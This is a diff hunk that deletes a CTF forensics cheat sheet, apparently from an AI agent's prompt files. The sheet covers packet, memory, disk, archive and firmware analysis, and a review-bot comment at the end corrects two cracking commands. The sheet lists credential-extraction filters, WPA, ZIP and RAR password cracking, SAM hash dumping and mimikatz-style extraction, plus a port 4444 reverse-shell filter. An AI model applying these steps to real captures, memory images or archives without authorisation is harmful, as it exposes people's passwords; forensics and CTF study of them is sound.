│ └── pdftotext <file.pdf> → extract all text
|
|
119
|
-
└── Office documents (DOCX/XLSX):
|
|
120
|
-
├── unzip <file.docx> → extract XML contents
|
|
121
|
-
├── Hidden text (white font, tiny size)
|
|
122
|
-
├── Document properties / custom metadata
|
|
123
|
-
└── Embedded OLE objects / macros
|
|
124
|
-
```
|
|
125
|
-
|
|
126
|
-
## Network Forensics (PCAP)
|
|
127
|
-
|
|
128
|
-
```
|
|
129
|
-
═══════════════════════════════════════
|
|
130
|
-
Wireshark / tshark analysis:
|
|
131
|
-
═══════════════════════════════════════
|
|
132
|
-
├── tshark -r file.pcap -T fields -e data → raw data extraction
|
|
133
|
-
├── tshark -r file.pcap -Y "http" -T fields -e http.request.uri
|
|
134
|
-
├── tshark -r file.pcap -Y "ftp" -T fields -e ftp.request.arg
|
|
135
|
-
├── Follow TCP stream: tcp.stream eq <N>
|
|
136
|
-
├── Export HTTP objects: File → Export Objects → HTTP
|
|
137
|
-
└── Statistics → Protocol Hierarchy → see what protocols are used
|
|
138
|
-
|
|
139
|
-
═══════════════════════════════════════
|
|
140
|
-
Common PCAP patterns in CTF:
|
|
141
|
-
═══════════════════════════════════════
|
|
142
|
-
├── HTTP: credentials in POST, file downloads, flag in response
|
|
143
|
-
├── FTP: RETR/STOR commands → extract transferred files
|
|
144
|
-
│ tshark -r file.pcap -Y "ftp-data" -T fields -e data | xxd -r -p > extracted
|
|
145
|
-
├── DNS exfiltration:
|
|
146
|
-
│ ├── Subdomain encoding: base64/hex data in query names
|
|
147
|
-
│ ├── TXT records containing hidden data
|
|
148
|
-
│ └── tshark -r file.pcap -Y "dns.qry.type==16" -T fields -e dns.txt
|
|
149
|
-
├── ICMP tunneling:
|
|
150
|
-
│ ├── Data hidden in ICMP payload (ping data section)
|
|
151
|
-
│ └── tshark -r file.pcap -Y "icmp" -T fields -e data
|
|
152
|
-
├── TLS/SSL:
|
|
153
|
-
│ ├── If RSA private key available: edit → preferences → TLS → RSA keys
|
|
154
|
-
│ ├── If SSLKEYLOGFILE available: set in TLS preferences → pre-master secret log
|
|
155
|
-
│ └── Check for self-signed certs, weak ciphers, heartbleed
|
|
156
|
-
├── USB keyboard capture:
|
|
157
|
-
│ ├── tshark -r file.pcap -Y "usb.transfer_type==0x01" -T fields -e usbhid.data
|
|
158
|
-
│ └── Map HID keycodes to characters (0x04=a, 0x05=b, ...)
|
|
159
|
-
├── WiFi (802.11):
|
|
160
|
-
│ ├── aircrack-ng file.pcap -w rockyou.txt → crack WPA
|
|
161
|
-
│ └── airdecap-ng -p <password> file.pcap → decrypt traffic
|
|
162
|
-
└── Custom protocols:
|
|
163
|
-
├── Unknown ports → analyze payload patterns manually
|
|
164
|
-
└── Scapy: rdpcap('file.pcap') → programmatic analysis
|
|
165
|
-
|
|
166
|
-
═══════════════════════════════════════
|
|
167
|
-
Key Wireshark filters:
|
|
168
|
-
═══════════════════════════════════════
|
|
169
|
-
├── http.request.method == "POST" → credential submissions
|
|
170
|
-
├── ftp.request.command == "PASS" → FTP passwords
|
|
171
|
-
├── smtp contains "AUTH" → email credentials
|
|
172
|
-
├── tcp.flags.syn == 1 → connection attempts
|
|
173
|
-
├── frame contains "flag" → direct flag search
|
|
174
|
-
├── !(arp || dns || mdns) → filter noise
|
|
175
|
-
├── ip.addr == 10.0.0.1 → specific host traffic
|
|
176
|
-
└── tcp.port == 4444 → specific port (reverse shell?)
|
|
177
|
-
```
|
|
178
|
-
|
|
179
|
-
## Memory Forensics
|
|
180
|
-
|
|
181
|
-
```
|
|
182
|
-
═══════════════════════════════════════
|
|
183
|
-
Volatility 3 (preferred):
|
|
184
|
-
═══════════════════════════════════════
|
|
185
|
-
Profile detection:
|
|
186
|
-
├── vol3 -f memory.dmp banners.Banners → detect OS
|
|
187
|
-
├── vol3 -f memory.dmp windows.info → Windows version info
|
|
188
|
-
└── vol3 -f memory.dmp linux.bash → Linux bash history
|
|
189
|
-
|
|
190
|
-
Key plugins — Windows:
|
|
191
|
-
├── vol3 -f memory.dmp windows.pslist → process list
|
|
192
|
-
├── vol3 -f memory.dmp windows.pstree → process tree
|
|
193
|
-
├── vol3 -f memory.dmp windows.cmdline → command history
|
|
194
|
-
├── vol3 -f memory.dmp windows.filescan → file handles in memory
|
|
195
|
-
├── vol3 -f memory.dmp windows.dumpfiles → extract files
|
|
196
|
-
│ --pid <PID> → filter by process
|
|
197
|
-
├── vol3 -f memory.dmp windows.hashdump → SAM password hashes → crack with hashcat!
|
|
198
|
-
├── vol3 -f memory.dmp windows.netscan → network connections
|
|
199
|
-
├── vol3 -f memory.dmp windows.registry.hivelist → registry hives
|
|
200
|
-
├── vol3 -f memory.dmp windows.registry.printkey → dump registry key
|
|
201
|
-
├── vol3 -f memory.dmp windows.malfind → detect injected code
|
|
202
|
-
├── vol3 -f memory.dmp windows.envars → environment variables (FLAG!)
|
|
203
|
-
└── vol3 -f memory.dmp windows.clipboard → clipboard content
|
|
204
|
-
|
|
205
|
-
Key plugins — Linux:
|
|
206
|
-
├── vol3 -f memory.dmp linux.pslist → processes
|
|
207
|
-
├── vol3 -f memory.dmp linux.bash → bash history (FLAG!)
|
|
208
|
-
├── vol3 -f memory.dmp linux.check_syscall → rootkit detection
|
|
209
|
-
├── vol3 -f memory.dmp linux.proc.Maps → memory maps
|
|
210
|
-
└── strings memory.dmp | grep -i "flag\|password\|secret\|key"
|
|
211
|
-
|
|
212
|
-
═══════════════════════════════════════
|
|
213
|
-
Volatility 2 (older workflow):
|
|
214
|
-
═══════════════════════════════════════
|
|
215
|
-
├── vol.py -f memory.dmp imageinfo → determine profile
|
|
216
|
-
├── vol.py -f memory.dmp --profile=<P> pslist
|
|
217
|
-
├── vol.py -f memory.dmp --profile=<P> hashdump
|
|
218
|
-
├── vol.py -f memory.dmp --profile=<P> mimikatz → credential extraction
|
|
219
|
-
├── vol.py -f memory.dmp --profile=<P> memdump -p <PID> -D output/
|
|
220
|
-
└── vol.py -f memory.dmp --profile=<P> timeliner → timeline analysis
|
|
221
|
-
|
|
222
|
-
═══════════════════════════════════════
|
|
223
|
-
Quick wins in memory forensics:
|
|
224
|
-
═══════════════════════════════════════
|
|
225
|
-
├── 1. strings + grep for flag patterns FIRST (fastest!)
|
|
226
|
-
├── 2. Process list → suspicious process? → dump its memory
|
|
227
|
-
├── 3. Command history (cmdline/bash) → look for flag manipulation
|
|
228
|
-
├── 4. Environment variables → flag stored in env
|
|
229
|
-
├── 5. Network connections → hidden services, exfiltration
|
|
230
|
-
├── 6. File scan → find flag.txt, secret.txt in memory
|
|
231
|
-
├── 7. Registry → passwords, recent documents, USB history
|
|
232
|
-
└── 8. Clipboard → copied passwords/flags
|
|
233
|
-
```
|
|
234
|
-
|
|
235
|
-
## Disk Forensics
|
|
236
|
-
|
|
237
|
-
```
|
|
238
|
-
═══════════════════════════════════════
|
|
239
|
-
Disk / Filesystem Analysis:
|
|
240
|
-
═══════════════════════════════════════
|
|
241
|
-
├── fdisk -l disk.img → partition layout
|
|
242
|
-
├── mmls disk.img → partition table (sleuthkit)
|
|
243
|
-
├── mount -o loop,ro,offset=<N> disk.img /mnt → mount partition
|
|
244
|
-
│ offset = start_sector × 512
|
|
245
|
-
├── autopsy → GUI forensic suite
|
|
246
|
-
├── Sleuthkit tools:
|
|
247
|
-
│ ├── fls -r disk.img → list all files (including deleted!)
|
|
248
|
-
│ ├── icat disk.img <inode> → extract file by inode
|
|
249
|
-
│ ├── blkcat disk.img <block> → read specific block
|
|
250
|
-
│ └── tsk_recover -e disk.img output/ → recover all files
|
|
251
|
-
├── photorec disk.img → recover deleted files (by file signature)
|
|
252
|
-
├── testdisk disk.img → partition recovery + file undelete
|
|
253
|
-
└── Check slack space:
|
|
254
|
-
blkstat disk.img <block> → check if block is allocated
|
|
255
|
-
|
|
256
|
-
═══════════════════════════════════════
|
|
257
|
-
Specific filesystem features:
|
|
258
|
-
═══════════════════════════════════════
|
|
259
|
-
├── NTFS Alternate Data Streams:
|
|
260
|
-
│ ├── dir /r → list ADS on Windows
|
|
261
|
-
│ ├── getfattr -R -d /mnt/* → list ADS on mounted NTFS
|
|
262
|
-
│ └── cat /mnt/file:hidden_stream → read ADS content
|
|
263
|
-
├── ext4 extended attributes:
|
|
264
|
-
│ ├── getfattr -d <file> → list xattrs
|
|
265
|
-
│ └── Journal: jls / jcat to read deleted journal entries
|
|
266
|
-
├── FAT filesystem:
|
|
267
|
-
│ ├── No file permissions → everything is readable
|
|
268
|
-
│ ├── Deleted files: filename starts with 0xE5
|
|
269
|
-
│ └── Volume label may contain clues
|
|
270
|
-
└── Filesystem timeline:
|
|
271
|
-
fls -m "/" -r disk.img | mactime -b - > timeline.csv
|
|
272
|
-
→ chronological view of file access/modification/creation
|
|
273
|
-
```
|
|
274
|
-
|
|
275
|
-
## Archive Analysis
|
|
276
|
-
|
|
277
|
-
```
|
|
278
|
-
Archive forensics:
|
|
279
|
-
├── ZIP:
|
|
280
|
-
│ ├── unzip -l archive.zip → list contents without extracting
|
|
281
|
-
│ ├── zipinfo archive.zip → detailed structure
|
|
282
|
-
│ ├── Known-plaintext attack: pkcrack → crack if partial content known
|
|
283
|
-
│ ├── fcrackzip -b -c 'aA1!' -l 1-8 archive.zip → brute force
|
|
284
|
-
│ ├── john --format=zip hash.txt → John the Ripper (zip2john first)
|
|
285
|
-
│ └── Zip slip: path traversal via ../../ in filenames
|
|
286
|
-
├── RAR:
|
|
287
|
-
│ ├── rar2john archive.rar > hash.txt → extract hash
|
|
288
|
-
│ └── hashcat -m 13000 hash.txt wordlist → crack
|
|
289
|
-
├── 7z:
|
|
290
|
-
│ └── 7z l -slt archive.7z → detailed listing
|
|
291
|
-
├── tar/gz/bz2:
|
|
292
|
-
│ ├── tar tf archive.tar → list contents
|
|
293
|
-
│ └── Check timestamp/permissions for clues
|
|
294
|
-
└── Nested archives:
|
|
295
|
-
Multiple compression layers (zip inside gz inside tar)
|
|
296
|
-
→ automate: write script to recursively extract until flag found
|
|
297
|
-
```
|
|
298
|
-
|
|
299
|
-
## Firmware Analysis
|
|
300
|
-
|
|
301
|
-
```
|
|
302
|
-
├── binwalk -e firmware.bin → extract filesystem
|
|
303
|
-
├── firmware-mod-kit → unpack/repack firmware
|
|
304
|
-
├── Common filesystems: squashfs, jffs2, cramfs, yaffs2
|
|
305
|
-
│ unsquashfs extracted/squashfs → mount squashfs
|
|
306
|
-
├── Look for:
|
|
307
|
-
│ ├── /etc/shadow or /etc/passwd → hardcoded credentials
|
|
308
|
-
│ ├── /etc/config/* → configuration files with secrets
|
|
309
|
-
│ ├── *.key, *.pem → private keys
|
|
310
|
-
│ ├── Web interface source code → vulnerabilities
|
|
311
|
-
│ └── Compiled binaries → reverse engineer
|
|
312
|
-
└── Emulation: qemu or firmadyne → run firmware for dynamic analysis
|
|
313
|
-
```
|
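Review bot: this hunk deletes the entire remaining forensics guidance (Volatility 2/3 memory workflow, Sleuthkit disk analysis, NTFS ADS and FAT notes, archive cracking, firmware extraction) and nothing in the hunk adds it back under another path, so confirm the agent still receives equivalent guidance from wherever the prompts now live, otherwise the CTF forensics capability silently disappears with this release. If any of the removed text is carried over, two lines need correcting on the way: `hashcat -m 13000 hash.txt wordlist` only handles RAR5 archives (RAR3 hashes from rar2john need `-m 12500`), and `fcrackzip -b -c 'aA1!' -l 1-8 archive.zip` lacks `-u`, without which fcrackzip reports many false-positive passwords because it never verifies a candidate by actually decompressing a member.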